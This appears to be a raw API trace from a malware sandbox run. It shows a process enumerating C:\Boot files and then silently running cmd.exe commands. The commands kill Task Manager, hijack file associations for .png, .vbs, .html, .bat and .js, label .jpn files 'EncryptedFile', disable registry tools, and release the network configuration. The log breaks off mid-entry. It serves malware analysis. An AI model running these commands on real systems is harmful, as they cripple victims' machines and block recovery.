[0156.342] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.342] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.342] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.342] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.342] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28784, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29114, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0156.343] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20718, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20d6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2553c, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25d10, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x22b2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x23b34, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8cb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d20, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae62bb5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12e5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0156.353] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.356] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0156.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1ad818) returned 1 [0246.457] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751470 [0246.457] LocalAlloc (uFlags=0x0, uBytes=0x3e) returned 0x75b6b8 [0246.457] ShellExecuteExW (in: pExecInfo=0x2147b70*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C taskkill /im taskmgr.exe /f", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2147b70*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C taskkill /im taskmgr.exe /f", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x468)) returned 1 [0246.911] LocalFree (hMem=0x751470) returned 0x0 [0246.911] LocalFree (hMem=0x75b6b8) returned 0x0 [0246.911] GetCurrentProcess () returned 0xffffffff [0246.911] GetCurrentProcess () returned 0xffffffff [0246.912] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x458) returned 1 [0246.912] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x458, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0256.405] CloseHandle (hObject=0x458) returned 1 [0256.406] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0256.406] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x7138f8 [0256.406] ShellExecuteExW (in: pExecInfo=0x2147d60*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .png=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2147d60*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .png=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x460)) returned 1 [0256.455] LocalFree (hMem=0x751218) returned 0x0 [0256.456] LocalFree (hMem=0x7138f8) returned 0x0 [0256.456] GetCurrentProcess () returned 0xffffffff [0256.456] GetCurrentProcess () returned 0xffffffff [0256.456] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x460, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x31c) returned 1 [0256.456] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x31c, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0257.445] CloseHandle (hObject=0x31c) returned 1 [0257.447] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x7512f0 [0257.447] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x6f4590 [0257.447] ShellExecuteExW (in: pExecInfo=0x2147f50*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .vbs=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2147f50*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .vbs=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x46c)) returned 1 [0257.517] LocalFree (hMem=0x7512f0) returned 0x0 [0257.517] LocalFree (hMem=0x6f4590) returned 0x0 [0257.517] GetCurrentProcess () returned 0xffffffff [0257.517] GetCurrentProcess () returned 0xffffffff [0257.517] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x45c) returned 1 [0257.518] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x45c, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0260.876] CloseHandle (hObject=0x45c) returned 1 [0260.877] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0260.877] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x713768 [0260.877] ShellExecuteExW (in: pExecInfo=0x2148140*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .html=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148140*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .html=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x470)) returned 1 [0261.248] LocalFree (hMem=0x751218) returned 0x0 [0261.248] LocalFree (hMem=0x713768) returned 0x0 [0261.248] GetCurrentProcess () returned 0xffffffff [0261.248] GetCurrentProcess () returned 0xffffffff [0261.249] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x354) returned 1 [0261.249] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x354, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0265.259] CloseHandle (hObject=0x354) returned 1 [0265.259] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0265.259] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x713768 [0265.259] ShellExecuteExW (in: pExecInfo=0x2148330*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .bat=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148330*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .bat=NotSoCleverBotFile", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x474)) returned 1 [0266.556] LocalFree (hMem=0x751218) returned 0x0 [0266.556] LocalFree (hMem=0x713768) returned 0x0 [0266.560] GetCurrentProcess () returned 0xffffffff [0266.561] GetCurrentProcess () returned 0xffffffff [0266.561] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x31c) returned 1 [0266.561] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x31c, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0269.343] CloseHandle (hObject=0x31c) returned 1 [0269.345] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0269.345] LocalAlloc (uFlags=0x0, uBytes=0x38) returned 0x737a28 [0269.345] ShellExecuteExW (in: pExecInfo=0x2148514*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .jpn=EncryptedFile", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148514*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .jpn=EncryptedFile", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x478)) returned 1 [0269.401] LocalFree (hMem=0x751218) returned 0x0 [0269.402] LocalFree (hMem=0x737a28) returned 0x0 [0269.402] GetCurrentProcess () returned 0xffffffff [0269.402] GetCurrentProcess () returned 0xffffffff [0269.402] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x45c) returned 1 [0269.402] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x45c, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0272.124] CloseHandle (hObject=0x45c) returned 1 [0272.124] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0272.124] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x75e3d8 [0272.124] ShellExecuteExW (in: pExecInfo=0x21486ec*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .js=exe1file", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x21486ec*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C assoc .js=exe1file", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x47c)) returned 1 [0272.165] LocalFree (hMem=0x751218) returned 0x0 [0272.165] LocalFree (hMem=0x75e3d8) returned 0x0 [0272.166] GetCurrentProcess () returned 0xffffffff [0272.166] GetCurrentProcess () returned 0xffffffff [0272.166] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x354) returned 1 [0272.166] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x354, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0275.165] CloseHandle (hObject=0x354) returned 1 [0275.166] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0275.166] LocalAlloc (uFlags=0x0, uBytes=0xee) returned 0x728da8 [0275.166] ShellExecuteExW (in: pExecInfo=0x2148988*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148988*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x480)) returned 1 [0275.205] LocalFree (hMem=0x751218) returned 0x0 [0275.205] LocalFree (hMem=0x728da8) returned 0x0 [0275.315] GetCurrentProcess () returned 0xffffffff [0275.315] GetCurrentProcess () returned 0xffffffff [0275.315] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x31c) returned 1 [0275.315] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x31c, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0278.411] CloseHandle (hObject=0x31c) returned 1 [0278.411] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0278.411] LocalAlloc (uFlags=0x0, uBytes=0x2a) returned 0x75e5d0 [0278.412] ShellExecuteExW (in: pExecInfo=0x2148b60*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C ipconfig /release", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148b60*(cbSize=0x3c, fMask=0x540, hwnd=0x0, 